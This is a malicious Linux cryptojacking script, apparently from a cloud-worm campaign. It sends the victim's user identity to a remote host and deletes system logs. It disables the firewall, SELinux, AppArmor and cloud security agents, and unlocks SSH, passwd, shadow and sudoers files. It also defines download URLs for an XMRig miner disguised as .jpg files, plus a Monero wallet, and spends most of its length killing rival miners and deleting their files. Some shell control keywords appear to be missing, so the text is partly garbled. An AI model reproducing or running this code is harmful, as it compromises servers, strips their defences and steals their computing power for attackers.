us=$(id)
curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
cd1 "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
ulimit -n 65535
export MOHOME=/var/tmp/.copydie
mkdir $MOHOME -p
if [ -f "$MOHOME/[kswapd0].log" ]
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" $MOHOME/[kswapd0].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
echo "miner process running"
exit 1
echo "miner process not running"
if [ -f "/usr/share/[crypto].log" ]
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" /usr/share/[crypto].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
echo "miner process running"
exit 1
echo "miner process not running"
if [ -f "/var/tmp/.system/[ext4].log" ]
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" /var/tmp/.system/[ext4].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
echo "miner process running"
exit 1
echo "miner process not running"
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
if ps aux | grep -i '[a]liyun'; then
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
export ARCH=amd64
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor
echo "ali cloud monitor not running"
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
MOxmrigMOD=http://58.226.35.74/midd.jpg
MOxmrigSTOCK=http://58.226.35.74/midd.jpg
miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg
config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg
config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg
WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.peter44d
VERSION=2.9
function FixTheSystem(){
echo "begin FixTheSystem"
tntrecht -i /bin/chmod || chattr -i /bin/chmod
setfacl -m u::x /bin/chmod
tntrecht -i /bin/chattr || chattr -i /bin/chattr
chmod +x /bin/chattr || setfacl -m u::x /bin/chattr
SYSFILEARRAY=(/usr/bin/apt /usr/bin/apt-get /bin/yum /bin/kill /usr/lib/klibc/bin/kill /usr/bin/pkill /bin/pkill /sbin/shutdown /sbin/reboot /sbin/poweroff /sbin/telinit)
for SYSFILEBIN in ${SYSFILEARRAY[@]}; do
tntrecht -i $SYSFILEBIN
chattr -i $SYSFILEBIN
setfacl -m u::x /bin/chmod
setfacl -m u::x $SYSFILEBIN
chmod +x $SYSFILEBIN
chattr +i $SYSFILEBIN
tntrecht +i $SYSFILEBIN
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
setfacl -m u::x /bin/chmod
kill_miner_proc()
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'svc' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.kswapd0-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.kswapd0-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.kswapd0-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.kswapd0-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.kswapd0-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
pgrep -f xzpauectgr | xargs -I % kill -9 %
pgrep -f slxfbkmxtd | xargs -I % kill -9 %
pgrep -f mixtape | xargs -I % kill -9 %
pgrep -f addnj | xargs -I % kill -9 %
pgrep -f 200.68.17.196 | xargs -I % kill -9 %
pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %
pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %
pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %
pgrep -f honvbsasbf.conf | xargs -I % kill -9 %
pgrep -f mqdsflm.cf | xargs -I % kill -9 %
pgrep -f lower.sh | xargs -I % kill -9 %
pgrep -f ./ppp | xargs -I % kill -9 %
pgrep -f kswapd0night | xargs -I % kill -9 %
pgrep -f ./seervceaess | xargs -I % kill -9 %
pgrep -f ./servceaess | xargs -I % kill -9 %
pgrep -f ./servceas | xargs -I % kill -9 %
pgrep -f ./servcesa | xargs -I % kill -9 %
pgrep -f ./vsp | xargs -I % kill -9 %
pgrep -f ./jvs | xargs -I % kill -9 %
pgrep -f ./pvv | xargs -I % kill -9 %
pgrep -f ./vpp | xargs -I % kill -9 %
pgrep -f ./pces | xargs -I % kill -9 %
pgrep -f ./rspce | xargs -I % kill -9 %
pgrep -f ./haveged | xargs -I % kill -9 %
pgrep -f ./jiba | xargs -I % kill -9 %
pgrep -f ./watchbog | xargs -I % kill -9 %
pgrep -f ./A7mA5gb | xargs -I % kill -9 %
pgrep -f kacpi_svc | xargs -I % kill -9 %
pgrep -f kswap_svc | xargs -I % kill -9 %
pgrep -f kauditd_svc | xargs -I % kill -9 %
pgrep -f kpsmoused_svc | xargs -I % kill -9 %
pgrep -f kseriod_svc | xargs -I % kill -9 %
pgrep -f kthreadd_svc | xargs -I % kill -9 %
pgrep -f ksoftirqd_svc | xargs -I % kill -9 %
pgrep -f kintegrityd_svc | xargs -I % kill -9 %
pgrep -f jawa | xargs -I % kill -9 %
pgrep -f oracle.jpg | xargs -I % kill -9 %
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %
pgrep -f 188.209.49.54 | xargs -I % kill -9 %
pgrep -f 181.214.87.241 | xargs -I % kill -9 %
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %
pgrep -f servim | xargs -I % kill -9 %
pgrep -f kblockd_svc | xargs -I % kill -9 %
pgrep -f native_svc | xargs -I % kill -9 %
pgrep -f ynn | xargs -I % kill -9 %
pgrep -f 65ccEJ7 | xargs -I % kill -9 %
pgrep -f jmxx | xargs -I % kill -9 %
pgrep -f 2Ne80nA | xargs -I % kill -9 %
pgrep -f sysstats | xargs -I % kill -9 %
pgrep -f systemxlv | xargs -I % kill -9 %
pgrep -f watchbog | xargs -I % kill -9 %
pgrep -f OIcJi1m | xargs -I % kill -9 %
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f kswapd0night
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f kswapd0-pool
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f polkitd
pkill -f nanoWatch
pkill -f zigw
pkill -f devtool
pkill -f devtools
pkill -f systemctI
pkill -f watchbog
pkill -f kswapd0night
pkill -f sustes
pkill -f xmrig
pkill -f xmrig-cpu
pkill -f 121.42.151.137
pkill -f init12.cfg
pkill -f nginxk
pkill -f tmp/wc.conf
pkill -f xmrig-notls
pkill -f xmr-stak
pkill -f suppoie
pkill -f zer0day.ru
pkill -f dbus-daemon--system
pkill -f nullcrew
pkill -f systemctI
pkill -f kworkerds
pkill -f init10.cfg
pkill -f /wl.conf
pkill -f crond64
pkill -f sustse
pkill -f vmlinuz
pkill -f exin
pkill -f apachiii
pkill -f svcworkmanager
pkill -f xr
pkill -f trace
pkill -f svcupdate
pkill -f networkmanager
pkill -f phpupdate
rm -rf /usr/bin/config.json
rm -rf /usr/bin/exin
rm -rf /tmp/wc.conf
rm -rf /tmp/log_rot
rm -rf /tmp/apachiii
rm -rf /tmp/sustse
rm -rf /tmp/php
rm -rf /tmp/p2.conf
rm -rf /tmp/pprt
rm -rf /tmp/ppol
rm -rf /tmp/javax/config.sh
rm -rf /tmp/javax/sshd2
rm -rf /tmp/.profile
rm -rf /tmp/1.so
rm -rf /tmp/kworkerds
rm -rf /tmp/kworkerds3
rm -rf /tmp/kworkerdssx
rm -rf /tmp/xd.json
rm -rf /tmp/syslogd
rm -rf /tmp/syslogdb
rm -rf /tmp/65ccEJ7
rm -rf /tmp/jmxx
rm -rf /tmp/2Ne80nA
rm -rf /tmp/dl
rm -rf /tmp/ddg
rm -rf /tmp/systemxlv
rm -rf /tmp/systemctI
rm -rf /tmp/.abc
rm -rf /tmp/osw.hb
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/.java
rm -rf /tmp/.omed
rm -rf /tmp/.tmpc
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/gates.lod
rm -rf /tmp/conf.n
rm -rf /tmp/devtool
rm -rf /tmp/devtools
rm -rf /tmp/fs
rm -rf /tmp/.rod
rm -rf /tmp/.rod.tgz
rm -rf /tmp/.rod.tgz.1
rm -rf /tmp/.rod.tgz.2
rm -rf /tmp/.mer
rm -rf /tmp/.mer.tgz
rm -rf /tmp/.mer.tgz.1
rm -rf /tmp/.hod
rm -rf /tmp/.hod.tgz
rm -rf /tmp/.hod.tgz.1
rm -rf /tmp/84Onmce
rm -rf /tmp/C4iLM4L
rm -rf /tmp/lilpip
rm -rf /tmp/3lmigMo
rm -rf /tmp/am8jmBP
rm -rf /tmp/tmp.txt
rm -rf /tmp/baby
rm -rf /tmp/.lib
rm -rf /tmp/systemd
rm -rf /tmp/lib.tar.gz
rm -rf /tmp/baby
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.mynews1234
rm -rf /tmp/a3e12d
rm -rf /tmp/.pt
rm -rf /tmp/.pt.tgz
rm -rf /tmp/.pt.tgz.1
rm -rf /tmp/go
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.tmpnewasss
rm -rf /tmp/java
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
rm -rf /tmp/khugepageds
rm -rf /tmp/.censusqqqqqqqqq
rm -rf /tmp/.kerberods
rm -rf /tmp/kerberods
rm -rf /tmp/seasame
rm -rf /tmp/touch
rm -rf /tmp/.p
rm -rf /tmp/runtime2.sh
rm -rf /tmp/runtime.sh
rm -rf /dev/shm/z3.sh
rm -rf /dev/shm/z2.sh
rm -rf /dev/shm/.scr
rm -rf /dev/shm/.kerberods
rm -rf /tmp/watchdogs
rm -rf /etc/cron.d/tomcat
rm -rf /etc/rc.d/init.d/watchdogs
rm -rf /usr/sbin/watchdogs
rm -f /tmp/kthrotlds
rm -f /etc/rc.d/init.d/kthrotlds
rm -rf /tmp/.sysbabyuuuuu12
rm -rf /tmp/logo9.jpg
rm -rf /tmp/miner.sh
rm -rf /tmp/nullcrew
rm -rf /tmp/proc
rm -rf /tmp/2.sh
rm /opt/atlassian/confluence/bin/1.sh
rm /opt/atlassian/confluence/bin/1.sh.1
rm /opt/atlassian/confluence/bin/1.sh.2
rm /opt/atlassian/confluence/bin/1.sh.3
rm /opt/atlassian/confluence/bin/3.sh
rm /opt/atlassian/confluence/bin/3.sh.1
rm /opt/atlassian/confluence/bin/3.sh.2
rm /opt/atlassian/confluence/bin/3.sh.3
rm -rf /var/tmp/f41
rm -rf /var/tmp/2.sh
rm -rf /var/tmp/config.json
rm -rf /var/tmp/xmrig
rm -rf /var/tmp/1.so
rm -rf /var/tmp/kworkerds3
rm -rf /var/tmp/kworkerdssx
rm -rf /var/tmp/kworkerds
rm -rf /var/tmp/wc.conf
rm -rf /var/tmp/nadezhda.
rm -rf /var/tmp/nadezhda.arm
rm -rf /var/tmp/nadezhda.arm.1
rm -rf /var/tmp/nadezhda.arm.2
rm -rf /var/tmp/nadezhda.x86_64
rm -rf /var/tmp/nadezhda.x86_64.1
rm -rf /var/tmp/nadezhda.x86_64.2
rm -rf /var/tmp/sustse3
rm -rf /var/tmp/sustse
rm -rf /var/tmp/moneroocean/
rm -rf /var/tmp/devtool
rm -rf /var/tmp/devtools
rm -rf /var/tmp/play.sh
rm -rf /var/tmp/systemctI
rm -rf /var/tmp/.java
